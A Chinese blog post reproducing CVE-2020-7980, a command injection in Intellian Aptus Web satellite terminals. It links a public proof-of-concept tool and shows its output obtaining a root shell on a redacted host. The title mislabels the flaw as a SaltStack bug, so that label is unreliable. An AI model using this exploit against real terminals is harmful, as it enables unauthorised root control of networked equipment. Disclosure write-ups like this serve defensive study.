Satellian远程命令执行漏洞CVE-2020-7980(saltstack远程命令执行漏洞)

漏洞描述

Intellian Aptus Web 1.24 允许远程攻击者通过 JSON 数据中的 Q 字段执行任意操作系统命令cgi-bin/libagent.cgi URI。注意:可能需要用于登录 intellian 默认帐户的有效 sid cookie
 


 

漏洞复现

https://github.com/Xh4H/Satellian-CVE-2020-7980/

xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
                  ________________________________________
         (__)    /                                        
         (oo)   (     Intellian Satellite Terminal PoC     )
  /-------/ --' ________________________________________/
 / |     ||
*  ||----||             

Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...

Satellian $ id
uid=0(root) gid=0(root)

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞7赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像谨果0